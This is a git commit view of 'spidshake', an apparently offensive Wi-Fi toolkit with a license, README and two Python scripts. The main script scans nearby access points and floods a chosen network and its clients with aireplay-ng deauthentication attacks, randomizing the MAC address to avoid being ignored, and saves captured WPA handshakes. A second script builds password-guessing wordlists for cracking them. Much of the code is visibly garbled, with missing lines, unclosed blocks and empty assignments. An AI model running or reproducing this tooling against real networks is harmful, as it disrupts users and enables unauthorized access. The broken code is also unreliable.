initial commit

Bofh 2020-09-29 11:02:32 +02:00
commit 1e594b939f
5 changed files with 716 additions and 0 deletions

.gitignore vendored 100644
View File

@ -0,0 +1 @@

LICENSE 100644
View File

@ -0,0 +1,208 @@
Apache License
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction, and distribution
as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by the copyright
owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all other entities
that control, are controlled by, or are under common control with that entity.
For the purposes of this definition, "control" means (i) the power, direct
or indirect, to cause the direction or management of such entity, whether
by contract or otherwise, or (ii) ownership of fifty percent (50%) or more
of the outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity exercising permissions
granted by this License.
"Source" form shall mean the preferred form for making modifications, including
but not limited to software source code, documentation source, and configuration
"Object" form shall mean any form resulting from mechanical transformation
or translation of a Source form, including but not limited to compiled object
code, generated documentation, and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or Object form,
made available under the License, as indicated by a copyright notice that
is included in or attached to the work (an example is provided in the Appendix
"Derivative Works" shall mean any work, whether in Source or Object form,
that is based on (or derived from) the Work and for which the editorial revisions,
annotations, elaborations, or other modifications represent, as a whole, an
original work of authorship. For the purposes of this License, Derivative
Works shall not include works that remain separable from, or merely link (or
bind by name) to the interfaces of, the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including the original version
of the Work and any modifications or additions to that Work or Derivative
Works thereof, that is intentionally submitted to Licensor for inclusion in
the Work by the copyright owner or by an individual or Legal Entity authorized
to submit on behalf of the copyright owner. For the purposes of this definition,
"submitted" means any form of electronic, verbal, or written communication
sent to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems, and
issue tracking systems that are managed by, or on behalf of, the Licensor
for the purpose of discussing and improving the Work, but excluding communication
that is conspicuously marked or otherwise designated in writing by the copyright
owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity on behalf
of whom a Contribution has been received by Licensor and subsequently incorporated
within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of this
License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive,
no-charge, royalty-free, irrevocable copyright license to reproduce, prepare
Derivative Works of, publicly display, publicly perform, sublicense, and distribute
the Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of this License,
each Contributor hereby grants to You a perpetual, worldwide, non-exclusive,
no-charge, royalty-free, irrevocable (except as stated in this section) patent
license to make, have made, use, offer to sell, sell, import, and otherwise
transfer the Work, where such license applies only to those patent claims
licensable by such Contributor that are necessarily infringed by their Contribution(s)
alone or by combination of their Contribution(s) with the Work to which such
Contribution(s) was submitted. If You institute patent litigation against
any entity (including a cross-claim or counterclaim in a lawsuit) alleging
that the Work or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses granted to You
under this License for that Work shall terminate as of the date such litigation
is filed.
4. Redistribution. You may reproduce and distribute copies of the Work or
Derivative Works thereof in any medium, with or without modifications, and
in Source or Object form, provided that You meet the following conditions:
(a) You must give any other recipients of the Work or Derivative Works a copy
of this License; and
(b) You must cause any modified files to carry prominent notices stating that
You changed the files; and
(c) You must retain, in the Source form of any Derivative Works that You distribute,
all copyright, patent, trademark, and attribution notices from the Source
form of the Work, excluding those notices that do not pertain to any part
of the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its distribution,
then any Derivative Works that You distribute must include a readable copy
of the attribution notices contained within such NOTICE file, excluding those
notices that do not pertain to any part of the Derivative Works, in at least
one of the following places: within a NOTICE text file distributed as part
of the Derivative Works; within the Source form or documentation, if provided
along with the Derivative Works; or, within a display generated by the Derivative
Works, if and wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and do not modify the
License. You may add Your own attribution notices within Derivative Works
that You distribute, alongside or as an addendum to the NOTICE text from the
Work, provided that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and may provide
additional or different license terms and conditions for use, reproduction,
or distribution of Your modifications, or for any such Derivative Works as
a whole, provided Your use, reproduction, and distribution of the Work otherwise
complies with the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise, any
Contribution intentionally submitted for inclusion in the Work by You to the
Licensor shall be under the terms and conditions of this License, without
any additional terms or conditions. Notwithstanding the above, nothing herein
shall supersede or modify the terms of any separate license agreement you
may have executed with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade names,
trademarks, service marks, or product names of the Licensor, except as required
for reasonable and customary use in describing the origin of the Work and
reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or agreed to
in writing, Licensor provides the Work (and each Contributor provides its
KIND, either express or implied, including, without limitation, any warranties
A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness
of using or redistributing the Work and assume any risks associated with Your
exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory, whether
in tort (including negligence), contract, or otherwise, unless required by
applicable law (such as deliberate and grossly negligent acts) or agreed to
in writing, shall any Contributor be liable to You for damages, including
any direct, indirect, special, incidental, or consequential damages of any
character arising as a result of this License or out of the use or inability
to use the Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all other commercial
damages or losses), even if such Contributor has been advised of the possibility
of such damages.
9. Accepting Warranty or Additional Liability. While redistributing the Work
or Derivative Works thereof, You may choose to offer, and charge a fee for,
acceptance of support, warranty, indemnity, or other liability obligations
and/or rights consistent with this License. However, in accepting such obligations,
You may act only on Your own behalf and on Your sole responsibility, not on
behalf of any other Contributor, and only if You agree to indemnify, defend,
and hold each Contributor harmless for any liability incurred by, or claims
asserted against, such Contributor by reason of your accepting any such warranty
or additional liability. END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following boilerplate
notice, with the fields enclosed by brackets "[]" replaced with your own identifying
information. (Don't include the brackets!) The text should be enclosed in
the appropriate comment syntax for the file format. We also recommend that
a file or class name and description of purpose be included on the same "printed
page" as the copyright notice for easier identification within third-party
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
See the License for the specific language governing permissions and
limitations under the License.

3 100644
View File

@ -0,0 +1,3 @@
# spidshake
Fastest WPA handshake capturing tool ever made

352 100755
View File

@ -0,0 +1,352 @@
import xml.etree.ElementTree as ET
import prettytable
import subprocess
import threading
import argparse
import time
import xml
import sys
import os
import re
# default values
gaps = None
TDIR = '/tmp/wcrack'
TARGS = None
'handshake': False
def she(c,debug=False):
return subprocess.check_output(c,shell=True).decode('utf8','ignore').strip()
except Exception as e:
if debug:
return None
def main():
# yes, we use a global variable
# to get the program arguments
global TARGS
parser = argparse.ArgumentParser(description='The faster WPA Handshake capturer on Kali')
parser.add_argument('--dry-run', action='store_true', help="Don't do deauth attacks, just show how it would run")
parser.add_argument('-m', '--random-mac', action='store_true', help="Randomize your MAC address at start (keeping vendor bits)")
parser.add_argument('-fa', '--force-attack', action='store_true', help="Deauths the AP before looking for connected clients")
parser.add_argument('-f', '--force', action='store_true', help='Continue on program exceptions that might ocurr, but are not critical')
parser.add_argument('-ex', '--exclude-conf', action='store_true', help="Exclude ESSIDs by regex reading /etc/spidshake/exclude.conf")
reqgroup = parser.add_argument_group('required arguments')
reqgroup.add_argument('-i','--interface', type=str, required=True, help="Interface on monitor mode to be used")
parser.add_argument('-sm','--show-max', default=12, type=int, help="Maximum Access Points to display on screen")
TARGS = parser.parse_args(sys.argv[1:])
# make the tmp dir
os.system('mkdir -p {}'.format(TDIR))
# the netxml file to read
apdata = []
nxmlfile = '{}/airodump-01.kismet.netxml'.format(TDIR)
# start dumping ap data
def render_access_points(apdata):
if len(apdata) > 0:
tb = prettytable.PrettyTable(['CH','BSSID','PW','C','#','ESSID'])
i = 0
for ap in apdata:
tb.add_row([ap['channel'], ap['bssid'][-8:], \
ap['signal'], len(ap['clients']), i, ap['essid']])
i += 1
# show aps indefinetly
li = 0
while True:
# get access point data
apdata = get_ap_data(nxmlfile)
li += 1
except KeyboardInterrupt:
# if no access points, we quit
if len(apdata) == 0:
return 0
# select the desired AP
select = 0
select = int(input('[[ Select AP index ]]: ').strip())
except ValueError:
# if index is correct, start attacking
if len(apdata) > 0 and select >= 0 and select < len(apdata):
ap_attack(nxmlfile, apdata, select)
def randomize_mac():
if TARGS.random_mac:
os.system('ifconfig {} down'.format(TARGS.interface))
# fully random macs don't usually work on deauthing, they are ignored
# so we set a fully random mac, but leaving the vendor bits unchanged
os.system('macchanger -r -e {} 2>&1 | tail -n1'.format(TARGS.interface))
os.system('ifconfig {} up'.format(TARGS.interface))
# use airodump-ng to capture all APs in
# netxml format (2.4GHZ support only, yet)
def airodump_all():
# yes, we kill all airodump-ng
os.system('pkill -9 airodump-ng')
os.system('rm {}/airodump* 2>/dev/null'.format(TDIR))
os.system('airodump-ng {} -a -M -w {}/airodump --write-interval 1 --band a --output-format netxml --channel 1-14 -K 1 > /dev/null 2>&1 &'\
.format(TARGS.interface, TDIR))
# use airodump-ng with bssid and channel config
# to get clients and attack easier and faster
# pcap format added to check handshakes
def airodump_bssid(bssid,channel):
# yes, we kill all airodump-ng
os.system('pkill -9 airodump-ng')
os.system('rm {}/airodump* 2>/dev/null'.format(TDIR))
airodump-ng {} --bssid {} -a -M -w {}/airodump --write-interval 1 --band a --cswitch 2 --output-format pcap,netxml --channel {} -K 1 > /dev/null 2>&1 &
""".format(TARGS.interface, bssid, TDIR, channel))
# filter ap by bssid in aps
def ap_get_by_bssid(aps, bssid):
for ap in aps:
if ap['bssid'] == bssid:
return ap
return None
# do the access point attack
def ap_attack(f, aps, index):
global thstop
global atls
hashake = False
thstop = False
thattack = None
atls = []
sap = aps[index]
# start capturing bssid traffic with specific channel
airodump_bssid(sap['bssid'], sap['channel'])
while True:
# ap index will certainly change in our implementation
# we need to search the new given aps to match bssid
ap = aps[index]
if ap['bssid'] != sap['bssid']:
ap = ap_get_by_bssid(aps, sap['bssid'])
except IndexError:
ap = ap_get_by_bssid(aps, sap['bssid'])
if ap is None:
print('FATAL: cannot retrieve AP data!')
return 1
# print the ap details and
# the connnected clients
if (TARGS.force_attack and thattack is None) or (len(ap['clients']) > 0 and thattack is None):
thattack = threading.Thread(target=ap_attack_do_clients)
print('{}; channel: {}'.format(ap['essid'], ap['channel']))
print('{}\t{}\t{}'.format(ap['bssid'], ap['signal'], ap['vendor']))
for cli in ap['clients']:
print('--¬ {}\t{}\t{}'.format(cli['mac'], cli['signal'], cli['vendor']))
# print attack info lines
for l in atls:
# check for handshake
if TVARS['handshake']:
hsfile = 'hs/handshake_{}.cap'.format(sap['essid'])
os.system('mkdir -p hs/')
os.system("cp {}/airodump-01.cap '{}'".format(TDIR, hsfile))
input('## handshake: YES / saved on {}'.format(hsfile))
TVARS['handshake'] = False
thstop = True
return 0
# sleep and re-obtain, show handshake status
print('## handshake: {}'.format('NO' if not TVARS['handshake'] else 'YES'))
aps = get_ap_data(f)
global gaps
gaps = aps
# don't know why i did this, but works?
while len(aps) == 0:
aps = get_ap_data(f)
except KeyboardInterrupt:
thstop = True
print('INFO: returing to ap listing')
# thread to attack clients and ap
# while showing them in the main thread
def ap_attack_do_clients():
global thstop
global gaps
global atls
atls = []
hashake = False
while True:
if not gaps is None and not len(gaps) == 0:
if thstop:
return 0
# explanation:
# attack n times, each n seconds
# @ An array of values
times = [
# do it all, baby
for ti in times:
gap = None
if len(gaps) == 1:
gap = gaps[0]
if gap is None:
print('FATAL: no access point or clients to attack')
return 1
randomize_mac(); time.sleep(0.5)
execrt('aireplay-ng --ignore-negative-one -0 {} -a {} {} 2>&1 &'.format( ti[0], gap['bssid'], TARGS.interface ))
atls.append('== deauth {} broadcast => {}'.format(ti[0], gap['bssid']))
for cl in gap['clients']:
if cl['signal'] < 0:
execrt('aireplay-ng --ignore-negative-one -0 {} -a {} -c {} --deauth-rc=2 {} 2>&1 &'.format(\
ti[0], gap['bssid'], cl['mac'], TARGS.interface ))
atls.append('== deauth {} client {} {}'.format(ti[0], cl['mac'], cl['vendor']))
atls.append('== deauth client skip {} {}'.format(cl['mac'], cl['vendor']))
i = 0
while i < ti[1]:
if ap_check_has_handshake():
TVARS['handshake'] = True
return 2
if thstop:
return 0
i += 1
atls.append('FATAL: Attack did not succeed')
def execrt(cmd):
if not TARGS.dry_run:
return 'X: {}'.format(cmd)
def ap_check_has_handshake():
out = subprocess.check_output(\
"aircrack-ng {}/airodump-01.cap 2>/dev/null | grep -o -P '\d+(?=\shandshake)'".format(TDIR), shell=True)\
return int(out) > 0
except FileNotFoundError:
return False
except subprocess.CalledProcessError:
return False
# get all access point data needed (including associated clients)
def get_ap_data(f):
c = None
c = open(f,'r').read()
# sanitize xml (improper essids...)
c = re.sub(r'(?<=\&\#[^\s])\s+(?=[^\s]+;)','',c)
c = re.sub(r'\&\#[^;]+;','',c)
root = ET.fromstring(c)
except FileNotFoundError as e:
return []
except xml.etree.ElementTree.ParseError as e2:
if TARGS.force:
return []
if not str(e2).startswith('no element found'):
return []
js = []
# iterate all network access points
exclude = []
if TARGS.exclude_conf:
with open('/etc/spidshake/exclude.conf','r') as r:
exclude =
except FileNotFoundError:
exclude = []
def is_excluded(essid, exls):
for reg in exls:
if re.match(reg, essid):
return True
return False
for net in root.findall('wireless-network'):
if net.find('SSID'):
item = {
'essid': net.find('SSID').find('essid').text,
'bssid': net.find('BSSID').text,
'vendor': net.find('manuf').text,
'channel': int(net.find('channel').text),
'beacons': int(net.find('SSID').find('packets').text),
'enctypes': [it.text for it in net.find('SSID').findall('encryption')],
'signal': int(net.find('snr-info').find('last_signal_dbm').text),
'clients': [],
if len(item['enctypes']) == 1 and item['enctypes'][0] == 'None':
for cli in net.findall('wireless-client'):
client = {
'mac': cli.find('client-mac').text,
'vendor': cli.find('client-manuf').text,
'channel': int(cli.find('channel').text),
'signal': int(cli.find('snr-info').find('last_signal_dbm').text),
item['clients'] = sorted(item['clients'], key=lambda x: x['signal'], reverse=True)
if not item['essid'] is None:
if not TARGS.exclude_conf or not is_excluded(item['essid'], exclude):
# order them by signal (dBm)
js = sorted(js, key=lambda x: x['signal'], reverse=True)
if len(js) > TARGS.show_max:
return js[:TARGS.show_max]
return js
if __name__ == '__main__':
os.system('pkill -9 airodump-ng')
except KeyboardInterrupt:
print('INFO: aborted')

tools/ 100755
View File

@ -0,0 +1,152 @@
import itertools
import argparse
import datetime
import sys
import os
import re
def main():
# argparse ftw
parser = argparse.ArgumentParser(description='Easiest WPA password generator')
reqgroup = parser.add_argument_group('required arguments')
reqgroup.add_argument('-i','--input', required=True, type=str, nargs='+', metavar='FOO,BAR', help="Comma separated strings of possible combinations. Ex: -i foo,bar raw,nobar")
parser.add_argument('-s', '--symbols', action='store_true', help="Include common symbols on common places")
parser.add_argument('-n', '--numbers', action='store_true', help="Include common numbers on the common places (such as 2018, 123, 12345)")
parser.add_argument('-l', '--level', type=int, default=1, choices=(1,2,3), metavar='N', help="Password level of complexity, 1 = only lower+upper, 2 = lower+upper+capital, 3 = lower+upper+capital+hackerize")
parser.add_argument('-o', '--output', type=str, metavar='OUT', help="Output file where to save the wordlist (default: stdout)")
args = parser.parse_args(sys.argv[1:])
wf = None
ostd = sys.stdout
if not args.output is None:
wf = open(args.output, 'w')
sys.stdout = wf
if not wf is None:
sys.stdout = ostd
# main generator function
# basically, every print(something) will be saved to
# either the output file, or the stdout
def generate_wordlist(args):
def rnd_symbols(w):
for r in '@$?%&#':
if '@' in w:
for it in args.input:
pms = []
bcs = []
for word in it.split(','):
bcs.append(generate_base_words(word, args.level))
nums = get_common_numbers() + get_lastnyears(20) + get_numrange(100)
for it in itertools.product(*bcs):
it = list(it)
opts = []
for cit in itertools.permutations(it,len(it)):
if args.symbols or args.numbers:
oit = it.copy()
if args.numbers:
li = oit.copy()
li.append('#'); it.append('#')
for cit in itertools.permutations(li,len(li)):
if args.symbols:
li = oit.copy()
li.append('@'); it.append('@')
for cit in itertools.permutations(li,len(li)):
for cit in itertools.permutations(it,len(it)):
opts = sorted(set(opts))
for it in opts:
cit = ''.join(it)
if '#' in it:
for n in nums:
cc = cit
cc = cc.replace('#',str(n))
if '@' in it and not '#' in it:
# gets combinations with replacement
# of 0,1 for the given word, to replace later
def true_false_combinations(word):
a = False; pm = []
for c in word:
a = not a; pm.append(not a)
return itertools.combinations_with_replacement(pm,len(word))
# generate base words for given word,
# with the given complexity level
def generate_base_words(word, clevel):
bc = []
if clevel >= 2:
bc += generate_all_capitalizations(word)
if clevel >= 3:
nw = []
for b in bc:
nw += generate_all_hackerization(b)
nw = sorted(set(nw))
bc += nw
return sorted(set(bc))
# generate all possibilities with capital letters
# with the given word, combining all with replacements
def generate_all_capitalizations(word):
rs = []
for bls in true_false_combinations(word):
w = word.lower(); i = 0
for b in bls:
if b:
w = w[:i] + w[i].upper() + w[i+1:]
i += 1
return sorted(set(rs))
# generate all hackerization possibilities with given word
# hackerization means replacing: A = 4, S = 5, E = 3, I = 1
def generate_all_hackerization(word):
def hackerize(c):
cl = c.lower()
mp = {'a':4,'s':5,'e':3,'i':1,'o':0}
return str(mp[cl]) if cl in mp else c
rs = []
for bls in true_false_combinations(word):
w = word; i = 0
for b in bls:
if b:
w = w[:i] + hackerize(w[i]) + w[i+1:]
i += 1
return rs
# common numbers used on password
def get_common_numbers():
return ['123','1234','135','12345','123456','1234567890','098','09876','0987654321']
# get the last N years in time
def get_lastnyears(n):
y =
ys = []
for i in range(0,n):
return ys
# get a number range from 0
def get_numrange(ln):
ns = []
for i in range(0,ln):
return ns
if __name__ == '__main__':
except BrokenPipeError: